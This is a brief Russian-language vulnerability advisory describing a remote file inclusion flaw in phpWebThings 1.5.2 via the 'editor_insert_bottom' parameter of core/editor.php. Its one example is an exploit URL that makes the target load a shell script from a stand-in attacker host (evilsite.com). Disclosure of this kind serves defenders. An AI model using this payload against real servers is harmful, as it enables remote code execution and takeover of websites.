Программа: phpWebThings 1.5.2

Уязвимость позволяет злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в обработке входных данных в параметре «editor_insert_bottom» сценарием editor.php. Атакующий может выполнить произвольный сценарий в контексте безопасности Web сервера.

Пример:

http://[target]/[path]/core/editor.php?editor_insert_bottom=http://evilsite.com/shell.php

Оставить мнение